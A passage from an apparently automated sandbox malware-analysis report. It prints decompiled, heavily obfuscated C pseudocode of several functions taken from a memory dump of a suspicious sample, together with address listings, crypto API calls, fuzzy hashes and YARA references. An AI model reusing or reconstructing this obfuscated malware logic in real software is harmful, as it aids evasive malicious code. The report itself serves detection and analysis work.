				_v124 = _v124 ^ 0x879587c2;
				_v124 = _v124 | 0xdff4f7f6;
				_v124 = _v124 ^ 0xdff58592;
				_v80 = 0x5082;
				_v80 = _v80 * 5;
				_v80 = _v80 ^ 0x0001dd7a;
				_v100 = 0x94cc;
				_v100 = _v100 >> 1;
				_v100 = _v100 + 0xc5d3;
				_v100 = _v100 ^ 0x0001674a;
				_v104 = 0x7528;
				_v104 = _v104 | 0x4afc80c9;
				_v104 = _v104 * 0x41;
				_v104 = _v104 ^ 0x0a3a6635;
				_v108 = 0x5a30;
				_v108 = _v108 >> 6;
				_t145 = 0x51;
				_v108 = _v108 / _t144;
				_v108 = _v108 ^ 0x00000b43;
				_v128 = 0x7a75;
				_v128 = _v128 ^ 0x183e3e2b;
				_v128 = _v128 >> 0xe;
				_v128 = _v128 << 1;
				_v128 = _v128 ^ 0x0000b567;
				_v88 = 0xd0b6;
				_v88 = _v88 << 2;
				_v88 = _v88 ^ 0x0003606d;
				_v92 = 0x29e5;
				_v92 = _v92 << 0x10;
				_v92 = _v92 ^ 0x29e559c0;
				_v116 = 0xa20c;
				_v116 = _v116 / _t145;
				_v116 = _v116 << 1;
				_v116 = _v116 ^ 0x00003b63;
				_v120 = 0xbe93;
				_v120 = _v120 | 0x1a4ed6db;
				_v120 = _v120 + 0xa009;
				_v120 = _v120 + 0xfffff07c;
				_v120 = _v120 ^ 0x1a4feb5f;
				_v96 = 0x4975;
				_t146 = 0x2b;
				_v96 = _v96 * 0x31;
				_v96 = _v96 / _t146;
				_v96 = _v96 ^ 0x000025f7;
				do {
					while(_t149 != 0x1a9c3b7) {
						if(_t149 == 0xb87d72f) {
							__eflags = E0022B055(_v120, _v96, __eflags,  &_v76, _t169 + 8);
							_t170 =  !=  ? 1 : _t170;
						} else {
							if(_t149 == 0x18640a1d) {
								_t149 = 0x1a19e858;
								continue;
							} else {
								if(_t149 == 0x1a19e858) {
									E002350F2( &_v76, _v112, _v84, _v124, _a12);
									_t173 = _t173 + 0xc;
									_t149 = 0x1a9c3b7;
									continue;
								} else {
									if(_t149 != 0x2b3c78b1) {
										goto L13;
									} else {
										_t143 = E00238F11( &_v76, _v128, _v88, _t169 + 4, _v92, _v116);
										_t173 = _t173 + 0x10;
										if(_t143 != 0) {
											_t149 = 0xb87d72f;
											continue;
										}
									}
								}
							}
						}
						L16:
						return _t170;
					}
					_t136 = E00238F11( &_v76, _v80, _v100, _t169, _v104, _v108);
					_t173 = _t173 + 0x10;
					__eflags = _t136;
					if(__eflags == 0) {
						_t149 = 0x1a747795;
						goto L13;
					} else {
						_t149 = 0x2b3c78b1;
						continue;
					}
					goto L16;
					L13:
					__eflags = _t149 - 0x1a747795;
				} while (__eflags != 0);
				goto L16;
			}



























                                              0x0022128a
                                              0x00221291
                                              0x00221298
                                              0x0022129f
                                              0x002212a0
                                              0x002212a7
                                              0x002212a8
                                              0x002212a9
                                              0x002212ae
                                              0x002212b6
                                              0x002212b9
                                              0x002212c8
                                              0x002212ca
                                              0x002212d1
                                              0x002212d4
                                              0x002212d8
                                              0x002212e0
                                              0x002212e8
                                              0x002212f0
                                              0x002212f8
                                              0x00221300
                                              0x00221308
                                              0x00221310
                                              0x00221318
                                              0x00221325
                                              0x00221329
                                              0x00221331
                                              0x00221339
                                              0x0022133d
                                              0x00221345
                                              0x0022134d
                                              0x00221355
                                              0x00221362
                                              0x00221366
                                              0x0022136e
                                              0x00221376
                                              0x00221381
                                              0x00221382
                                              0x00221388
                                              0x00221390
                                              0x00221398
                                              0x002213a0
                                              0x002213a5
                                              0x002213a9
                                              0x002213b1
                                              0x002213b9
                                              0x002213be
                                              0x002213c6
                                              0x002213ce
                                              0x002213d3
                                              0x002213db
                                              0x002213eb
                                              0x002213ef
                                              0x002213f3
                                              0x002213fb
                                              0x00221403
                                              0x0022140b
                                              0x00221413
                                              0x0022141b
                                              0x00221423
                                              0x00221432
                                              0x00221433
                                              0x00221447
                                              0x0022144b
                                              0x00221453
                                              0x00221453
                                              0x0022145d
                                              0x0022152a
                                              0x0022152c
                                              0x00221463
                                              0x00221469
                                              0x002214cd
                                              0x00000000
                                              0x0022146b
                                              0x0022146d
                                              0x002214be
                                              0x002214c3
                                              0x002214c6
                                              0x00000000
                                              0x0022146f
                                              0x00221475
                                              0x00000000
                                              0x0022147b
                                              0x00221493
                                              0x00221498
                                              0x0022149d
                                              0x002214a3
                                              0x00000000
                                              0x002214a3
                                              0x0022149d
                                              0x00221475
                                              0x0022146d
                                              0x00221469
                                              0x00221530
                                              0x0022153b
                                              0x0022153b
                                              0x002214e6
                                              0x002214eb
                                              0x002214ee
                                              0x002214f0
                                              0x002214fc
                                              0x00000000
                                              0x002214f2
                                              0x002214f2
                                              0x00000000
                                              0x002214f2
                                              0x00000000
                                              0x00221501
                                              0x00221501
                                              0x00221501
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 0Z$5f:$c;$uI$uz$zR
                                              • API String ID: 0-4070947617
                                              • Opcode ID: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
                                              • Instruction ID: df94728388e4c08ca3b0d5c4fc081ba750be5eae8751205a78b034a3cb702097
                                              • Opcode Fuzzy Hash: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
                                              • Instruction Fuzzy Hash: C8617571118341AFD758DE60D98591FBBE1FBC9708F80591DF19A862A0D7BACA28CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002217AC, Relevance: 7.7, Strings: 6, Instructions: 157COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 91%
                                              			E002217AC(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* __ecx;
				void* _t124;
				intOrPtr _t144;
				void* _t148;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				signed int* _t175;

				_push(_a20);
				_push(1);
				_push(1);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0022602B(_t124);
				_v48 = 0x839b;
				_t175 =  &(( &_v52)[7]);
				_t172 = 0;
				_t148 = 0xc9f1fee;
				_t167 = 0x65;
				_v48 = _v48 / _t167;
				_v48 = _v48 + 0xffff5433;
				_t168 = 0x4c;
				_v48 = _v48 / _t168;
				_v48 = _v48 ^ 0x035e614e;
				_v52 = 0x7a24;
				_t169 = 0x57;
				_v52 = _v52 * 0x3d;
				_v52 = _v52 / _t169;
				_v52 = _v52 | 0x143fc393;
				_v52 = _v52 ^ 0x143ff5ea;
				_v32 = 0x6195;
				_v32 = _v32 ^ 0x160f1dee;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x2c1ed936;
				_v44 = 0xc7f4;
				_v44 = _v44 + 0xffff31e5;
				_v44 = _v44 | 0xcdfc86d8;
				_v44 = _v44 + 0xffff4cbe;
				_v44 = _v44 ^ 0xffff1878;
				_v12 = 0x3e0d;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x0003ab13;
				_v24 = 0xe2a2;
				_t170 = 0x4a;
				_v24 = _v24 * 0x7d;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0006fa2b;
				_v16 = 0xd6eb;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x0000394e;
				_v40 = 0x5ece;
				_v40 = _v40 * 0x43;
				_v40 = _v40 / _t170;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0x000003d1;
				_v28 = 0xdfec;
				_v28 = _v28 >> 6;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x001be0b4;
				_v20 = 0x73b;
				_v20 = _v20 ^ 0xd6615083;
				_v20 = _v20 ^ 0xd6610707;
				_v36 = 0x46b8;
				_v36 = _v36 | 0xf1966772;
				_v36 = _v36 ^ 0x374c3a36;
				_v36 = _v36 * 0x27;
				_v36 = _v36 ^ 0x4b440184;
				_v8 = 0xd697;
				_v8 = _v8 ^ 0x6f8084df;
				_v8 = _v8 ^ 0x6f807f26;
				_t171 = _v4;
				while(_t148 != 0x24e4c4b) {
					if(_t148 == 0xc9f1fee) {
						_t148 = 0x3ad8e818;
						continue;
					} else {
						if(_t148 == 0x1ffca7a2) {
							E00231AB6(1, _v12, _t148, _a20, 1, _v24, _v16, _v4, _a4, _v40, _v28, _v20);
							_t175 =  &(_t175[0xa]);
							_t148 = 0x24e4c4b;
							_t172 =  !=  ? 1 : _t172;
							continue;
						} else {
							if(_t148 == 0x34494570) {
								if(E00230729(_v32,  &_v4, _v44, _t171) != 0) {
									_t148 = 0x1ffca7a2;
									continue;
								}
							} else {
								if(_t148 != 0x3ad8e818) {
									L13:
									if(_t148 != 0x2a0664e6) {
										continue;
									}
								} else {
									_t144 = E0022F6DF(_t148);
									_t171 = _t144;
									if(_t144 != 0xffffffff) {
										_t148 = 0x34494570;
										continue;
									}
								}
							}
						}
					}
					return _t172;
				}
				E00234F7D(_v36, _v8, _v4);
				_t148 = 0x2a0664e6;
				goto L13;
			}


























                                              0x002217b3
                                              0x002217ba
                                              0x002217bb
                                              0x002217bc
                                              0x002217c0
                                              0x002217c4
                                              0x002217c6
                                              0x002217cb
                                              0x002217d3
                                              0x002217dc
                                              0x002217de
                                              0x002217e5
                                              0x002217ea
                                              0x002217f0
                                              0x002217fc
                                              0x00221801
                                              0x00221807
                                              0x0022180f
                                              0x0022181c
                                              0x0022181f
                                              0x0022182b
                                              0x0022182f
                                              0x00221837
                                              0x0022183f
                                              0x00221847
                                              0x0022184f
                                              0x00221853
                                              0x0022185b
                                              0x00221863
                                              0x0022186b
                                              0x00221873
                                              0x0022187b
                                              0x00221883
                                              0x0022188b
                                              0x00221890
                                              0x00221898
                                              0x002218a5
                                              0x002218a6
                                              0x002218aa
                                              0x002218af
                                              0x002218b7
                                              0x002218bf
                                              0x002218c4
                                              0x002218cc
                                              0x002218d9
                                              0x002218e3
                                              0x002218e7
                                              0x002218ec
                                              0x002218f4
                                              0x002218fc
                                              0x00221901
                                              0x00221906
                                              0x0022190e
                                              0x00221916
                                              0x0022191e
                                              0x00221926
                                              0x00221933
                                              0x0022193b
                                              0x00221948
                                              0x0022194c
                                              0x00221954
                                              0x0022195c
                                              0x00221964
                                              0x0022196c
                                              0x00221970
                                              0x00221982
                                              0x00221a1a
                                              0x00000000
                                              0x00221988
                                              0x0022198a
                                              0x00221a03
                                              0x00221a08
                                              0x00221a0b
                                              0x00221a12
                                              0x00000000
                                              0x0022198c
                                              0x00221992
                                              0x002219d5
                                              0x002219d7
                                              0x00000000
                                              0x002219d7
                                              0x00221994
                                              0x0022199a
                                              0x00221a3b
                                              0x00221a41
                                              0x00000000
                                              0x00000000
                                              0x002219a0
                                              0x002219a8
                                              0x002219ad
                                              0x002219b2
                                              0x002219b8
                                              0x00000000
                                              0x002219b8
                                              0x002219b2
                                              0x0022199a
                                              0x00221992
                                              0x0022198a
                                              0x00221a50
                                              0x00221a50
                                              0x00221a30
                                              0x00221a36
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: >$$z$6:L7$N9$pEI4$pEI4
                                              • API String ID: 0-302225334
                                              • Opcode ID: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
                                              • Instruction ID: 59de74a452fecab7fbed2bb9528cb5de01348117578d84eb4bab802db580e151
                                              • Opcode Fuzzy Hash: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
                                              • Instruction Fuzzy Hash: 90615371118341AFD358CEA5D88581FBBE5BFC4358F444A1DF19696260C3B5CA6ACF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002320C5, Relevance: 7.6, Strings: 6, Instructions: 145COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E002320C5() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				void* _t124;
				short* _t127;
				void* _t132;
				void* _t134;
				intOrPtr _t150;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t167;
				void* _t169;

				_t169 = (_t167 & 0xfffffff8) - 0x250;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t132 = 0x3ec8c14;
				_v536 = 0x37230;
				_v544 = 0xcdd0;
				_v544 = _v544 >> 7;
				_v544 = _v544 ^ 0x000074a7;
				_v572 = 0xb951;
				_v572 = _v572 + 0xffffa9df;
				_v572 = _v572 ^ 0x00005eca;
				_v584 = 0x3783;
				_v584 = _v584 >> 1;
				_t159 = 0x30;
				_v584 = _v584 / _t159;
				_v584 = _v584 ^ 0x00007df0;
				_v592 = 0x764f;
				_t160 = 0x29;
				_v592 = _v592 * 0x6c;
				_v592 = _v592 + 0xffff1483;
				_v592 = _v592 ^ 0x0030effe;
				_v580 = 0x26e4;
				_v580 = _v580 + 0xffffa17d;
				_v580 = _v580 >> 0xc;
				_v580 = _v580 ^ 0x000fb6a3;
				_v588 = 0x592d;
				_v588 = _v588 * 0x5e;
				_v588 = _v588 + 0xfffff058;
				_v588 = _v588 ^ 0x0020c0b6;
				_v576 = 0x67c6;
				_v576 = _v576 >> 4;
				_v576 = _v576 | 0x70f0481f;
				_v576 = _v576 ^ 0x70f020ed;
				_v568 = 0x5c9a;
				_v568 = _v568 ^ 0x6d262440;
				_v568 = _v568 ^ 0x6d2624e4;
				_v552 = 0x512d;
				_v552 = _v552 / _t160;
				_v552 = _v552 ^ 0x00002fd7;
				_v540 = 0x67a3;
				_v540 = _v540 + 0x741c;
				_v540 = _v540 ^ 0x0000c39d;
				_v560 = 0xac4b;
				_v560 = _v560 | 0x611015d1;
				_v560 = _v560 ^ 0x6110f087;
				_v548 = 0xff97;
				_v548 = _v548 >> 8;
				_v548 = _v548 ^ 0x000016db;
				_v556 = 0xce04;
				_t161 = 0x2b;
				_v556 = _v556 / _t161;
				_v556 = _v556 ^ 0x000048b5;
				_v564 = 0x85d6;
				_v564 = _v564 >> 0xf;
				_v564 = _v564 ^ 0x00007642;
				do {
					while(_t132 != 0x3ec8c14) {
						if(_t132 == 0x4e3e716) {
							_push(_v572);
							_t124 = E0023889D(0x23c9b0, _v544, __eflags);
							_pop(_t134);
							_t150 =  *0x23ca2c; // 0x4d8300
							_t108 = _t150 + 0x230; // 0x700047
							E0022C680(_t108, _v592, _v580, _t134, _v588,  *0x23ca2c, _t124,  &_v524);
							_t169 = _t169 + 0x1c;
							_t127 = E00232025(_v576, _t124, _v568, _v552);
							_t132 = 0x36d909ae;
							continue;
						} else {
							if(_t132 == 0x2942dba3) {
								_t127 = E00232B16(_v548,  &_v524, E002384CC, _v564, 0,  &_v524);
							} else {
								if(_t132 != 0x36d909ae) {
									goto L8;
								} else {
									_t127 = E002228CE( &_v524, _v540, _v560);
									 *_t127 = 0;
									_t132 = 0x2942dba3;
									continue;
								}
							}
						}
						L11:
						return _t127;
					}
					_t132 = 0x4e3e716;
					L8:
					__eflags = _t132 - 0x16e8989b;
				} while (__eflags != 0);
				goto L11;
			}































                                              0x002320cb
                                              0x002320d1
                                              0x002320d8
                                              0x002320dd
                                              0x002320e2
                                              0x002320ea
                                              0x002320f2
                                              0x002320f7
                                              0x002320ff
                                              0x00232107
                                              0x0023210f
                                              0x00232117
                                              0x0023211f
                                              0x0023212d
                                              0x00232132
                                              0x00232138
                                              0x00232145
                                              0x0023215c
                                              0x0023215f
                                              0x00232163
                                              0x0023216b
                                              0x00232173
                                              0x0023217b
                                              0x00232183
                                              0x00232188
                                              0x00232190
                                              0x0023219d
                                              0x002321a1
                                              0x002321a9
                                              0x002321b1
                                              0x002321b9
                                              0x002321be
                                              0x002321c6
                                              0x002321ce
                                              0x002321d6
                                              0x002321de
                                              0x002321e6
                                              0x002321f6
                                              0x002321fa
                                              0x00232202
                                              0x0023220a
                                              0x00232212
                                              0x0023221a
                                              0x00232222
                                              0x0023222a
                                              0x00232232
                                              0x0023223a
                                              0x0023223f
                                              0x00232247
                                              0x00232253
                                              0x00232256
                                              0x0023225a
                                              0x00232262
                                              0x0023226a
                                              0x0023226f
                                              0x00232277
                                              0x00232277
                                              0x00232285
                                              0x002322ae
                                              0x002322bb
                                              0x002322c0
                                              0x002322dc
                                              0x002322e6
                                              0x002322ec
                                              0x002322f1
                                              0x00232302
                                              0x00232309
                                              0x00000000
                                              0x00232287
                                              0x00232289
                                              0x00232339
                                              0x0023228f
                                              0x00232291
                                              0x00000000
                                              0x00232293
                                              0x0023229f
                                              0x002322a7
                                              0x002322aa
                                              0x00000000
                                              0x002322aa
                                              0x00232291
                                              0x00232289
                                              0x00232341
                                              0x00232348
                                              0x00232348
                                              0x00232310
                                              0x00232312
                                              0x00232312
                                              0x00232312
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: -Q$-Y$Bv$Ov$$&m$&
                                              • API String ID: 0-2434786051
                                              • Opcode ID: 8db37b837f7d7cd696aed7eaac3d03f7606c48e008857dc620f6a8aee9a81163
                                              • Instruction ID: e418d9381e1f2814ff0ba1d5b110c8f83cb717efbe133d3a5a343860d1fa9514
                                              • Opcode Fuzzy Hash: 8db37b837f7d7cd696aed7eaac3d03f7606c48e008857dc620f6a8aee9a81163
                                              • Instruction Fuzzy Hash: AC5178B1118341AFD358DF21C88A91BBBF1FBC4328F509A1DF585462A0C7B58959CF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 100021F0, Relevance: 7.6, APIs: 5, Instructions: 67encryptionmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
                                              • CoTaskMemAlloc.OLE32(?), ref: 10002227
                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
                                              • StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
                                              • CoTaskMemFree.OLE32(00000000), ref: 1000227A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: BinaryCryptStringTask$AllocDeserializeFreePropVariant
                                              • String ID:
                                              • API String ID: 2967290590-0
                                              • Opcode ID: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
                                              • Instruction ID: 3bbe9fb0322c03d3a19eaaaaa04faf6b757ff22615bcfcbc1accf4c01beb8128
                                              • Opcode Fuzzy Hash: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
                                              • Instruction Fuzzy Hash: 51116D3AA01129BBEB10DBD48C44FDE77FCDB457A1F010266FE05E2154DA719A408AA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00226754, Relevance: 6.4, Strings: 5, Instructions: 140COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 86%
                                              			E00226754(intOrPtr __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				unsigned int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				void* _t96;
				signed int _t97;
				signed int _t101;
				intOrPtr _t104;
				signed int _t106;
				signed int _t107;
				void* _t108;
				signed int _t123;
				void* _t124;
				intOrPtr* _t128;
				signed int* _t129;

				_t129 =  &_v572;
				_v524 = _v524 & 0x00000000;
				_v532 = 0x37527f;
				_v528 = 0x4295e6;
				_v536 = 0xee22;
				_v536 = _v536 >> 0xc;
				_v536 = _v536 ^ 0x00007a3a;
				_v544 = 0x8f72;
				_v544 = _v544 | 0xa1a2610a;
				_v544 = _v544 ^ 0xa1a2ad19;
				_v540 = 0xc65b;
				_v540 = _v540 << 9;
				_v540 = _v540 ^ 0x018ca8d5;
				_v572 = 0x4354;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff6940;
				_v572 = _v572 * 0x52;
				_t128 = __edx;
				_v572 = _v572 ^ 0xb1ecefd2;
				_v552 = 0x7a0c;
				_t104 = __ecx;
				_v552 = _v552 | 0xfffddbf7;
				_t124 = 0x1663684c;
				_v552 = _v552 ^ 0xfffd8a47;
				_v568 = 0x9348;
				_t106 = 0xf;
				_v568 = _v568 * 0x32;
				_v568 = _v568 + 0x92e3;
				_v568 = _v568 * 0x69;
				_v568 = _v568 ^ 0x0c08d7a0;
				_v556 = 0x9f50;
				_v556 = _v556 / _t106;
				_v556 = _v556 >> 2;
				_v556 = _v556 ^ 0x000022d0;
				_v548 = 0xa3e1;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 ^ 0x000031bd;
				_v564 = 0x55b6;
				_v564 = _v564 >> 1;
				_v564 = _v564 + 0xaf4f;
				_t107 = 0x5e;
				_t123 = _v548;
				_v564 = _v564 / _t107;
				_v564 = _v564 ^ 0x0000417a;
				_v560 = 0xe775;
				_v560 = _v560 << 4;
				_v560 = _v560 << 0xd;
				_v560 = _v560 ^ 0xceea6264;
				do {
					while(_t124 != 0x32e36bf) {
						if(_t124 == 0xcc4ee6e) {
							 *((intOrPtr*)(_t123 + 0x24)) = _t104;
							_t97 =  *0x23ca24; // 0x0
							 *(_t123 + 0x2c) = _t97;
							 *0x23ca24 = _t123;
							return _t97;
						}
						if(_t124 != 0x1663684c) {
							if(_t124 == 0x2308bbf2) {
								return E0022F536(_v548, _v564, _v560, _t123);
							}
							if(_t124 != 0x242d3c72) {
								goto L12;
							} else {
								_push( &_v520);
								_t101 = E002288E5(_t104, _t128);
								asm("sbb esi, esi");
								_t107 = 0x23c910;
								_t124 = ( ~_t101 & 0xe0257acd) + 0x2308bbf2;
								continue;
							}
							L16:
							return _t101;
						}
						_push(_t107);
						_t108 = 0x38;
						_t101 = E00228736(_t108);
						_t123 = _t101;
						_t107 = _t107;
						if(_t123 != 0) {
							_t124 = 0x242d3c72;
							continue;
						}
						goto L16;
					}
					_push(_t107);
					_push(_v556);
					_push( &_v520);
					_push(_v568);
					_push(0);
					_push(_v552);
					_t107 = _v572;
					_push(0);
					_t96 = E0022568E(_t107, 0);
					_t129 =  &(_t129[7]);
					if(_t96 == 0) {
						_t124 = 0x2308bbf2;
						goto L12;
					} else {
						_t124 = 0xcc4ee6e;
						continue;
					}
					goto L16;
					L12:
				} while (_t124 != 0x2bbec955);
				return _t101;
			}




























                                              0x00226754
                                              0x0022675a
                                              0x0022675f
                                              0x00226767
                                              0x0022676f
                                              0x00226777
                                              0x0022677c
                                              0x00226784
                                              0x0022678c
                                              0x00226794
                                              0x0022679c
                                              0x002267a4
                                              0x002267a9
                                              0x002267b1
                                              0x002267b8
                                              0x002267bc
                                              0x002267cb
                                              0x002267cf
                                              0x002267d1
                                              0x002267db
                                              0x002267e3
                                              0x002267e5
                                              0x002267ed
                                              0x002267f2
                                              0x002267fa
                                              0x00226809
                                              0x0022680c
                                              0x00226810
                                              0x0022681d
                                              0x00226821
                                              0x00226829
                                              0x00226839
                                              0x0022683d
                                              0x00226842
                                              0x0022684a
                                              0x00226852
                                              0x00226857
                                              0x0022685f
                                              0x00226867
                                              0x0022686b
                                              0x00226877
                                              0x0022687a
                                              0x0022687e
                                              0x00226882
                                              0x0022688a
                                              0x00226892
                                              0x00226897
                                              0x0022689c
                                              0x002268a4
                                              0x002268a4
                                              0x002268b2
                                              0x00226984
                                              0x00226987
                                              0x0022698c
                                              0x0022698f
                                              0x00000000
                                              0x0022698f
                                              0x002268be
                                              0x002268c6
                                              0x00000000
                                              0x00226981
                                              0x002268d2
                                              0x00000000
                                              0x002268d8
                                              0x002268de
                                              0x002268e6
                                              0x002268f0
                                              0x002268f8
                                              0x002268f9
                                              0x00000000
                                              0x002268f9
                                              0x0022699f
                                              0x0022699f
                                              0x0022699f
                                              0x0022690d
                                              0x00226911
                                              0x00226912
                                              0x00226917
                                              0x0022691a
                                              0x0022691d
                                              0x0022691f
                                              0x00000000
                                              0x0022691f
                                              0x00000000
                                              0x0022691d
                                              0x00226929
                                              0x0022692a
                                              0x00226934
                                              0x00226935
                                              0x00226939
                                              0x0022693b
                                              0x0022693f
                                              0x00226943
                                              0x00226945
                                              0x0022694a
                                              0x0022694f
                                              0x0022695b
                                              0x00000000
                                              0x00226951
                                              0x00226951
                                              0x00000000
                                              0x00226951
                                              0x00000000
                                              0x00226960
                                              0x00226960
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: :z$r<-$$r<-$$u$zA
                                              • API String ID: 0-4189644680
                                              • Opcode ID: f066dbf450040fc7d509599e2895bfe3fab2f18ed293b4ee76d74ed708169123
                                              • Instruction ID: e7b93e92d52a7646bacef69599931cabe5c08af5f01b445fa3eda287ac8f55be
                                              • Opcode Fuzzy Hash: f066dbf450040fc7d509599e2895bfe3fab2f18ed293b4ee76d74ed708169123
                                              • Instruction Fuzzy Hash: 68518B72518312AFD318CF66D54951BBBE0EBC8758F10491DF4D8A62A0D7B8CA598F83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022839D, Relevance: 6.4, Strings: 5, Instructions: 140COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E0022839D(void* __ecx, void* __edi) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				int _t181;
				signed int _t184;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int _t194;
				void* _t211;
				void* _t215;
				signed int _t217;

				_v28 = 0x5ca2;
				_v28 = _v28 + 0x82ee;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x06fc8008;
				_v52 = 0x31f1;
				_v52 = _v52 * 0x4e;
				_t215 = __ecx;
				_t186 = 0x39;
				_v52 = _v52 * 0x4d;
				_v52 = _v52 >> 7;
				_v52 = _v52 ^ 0x00092748;
				_v20 = 0x7fc5;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x00d59d54;
				_v44 = 0xb39b;
				_v44 = _v44 + 0xf7d;
				_v44 = _v44 | 0x2a7b5142;
				_v44 = _v44 + 0xffff17c4;
				_v44 = _v44 ^ 0x2a7aeb0e;
				_v60 = 0x1587;
				_v60 = _v60 | 0x5979cfaa;
				_v60 = _v60 ^ 0xb2ac8491;
				_v60 = _v60 ^ 0x62b96002;
				_v60 = _v60 ^ 0x896c4508;
				_v16 = 0x3e7;
				_v16 = _v16 | 0x10c95731;
				_v16 = _v16 ^ 0x10c93485;
				_v56 = 0x1ea8;
				_v56 = _v56 << 4;
				_v56 = _v56 << 6;
				_v56 = _v56 / _t186;
				_v56 = _v56 ^ 0x0002353c;
				_v12 = 0x5bc0;
				_t187 = 0x13;
				_v12 = _v12 / _t187;
				_v12 = _v12 ^ 0x00001b6c;
				_v48 = 0x8f53;
				_v48 = _v48 ^ 0x72e3c217;
				_v48 = _v48 >> 0xb;
				_v48 = _v48 ^ 0x701cd0a1;
				_v48 = _v48 ^ 0x7012c214;
				_v24 = 0xa180;
				_v24 = _v24 | 0x7584ea2b;
				_v24 = _v24 + 0x36fb;
				_v24 = _v24 ^ 0x75854120;
				_v32 = 0x424b;
				_v32 = _v32 ^ 0x8f16dfbf;
				_v32 = _v32 << 0xc;
				_v32 = _v32 + 0xffffa50c;
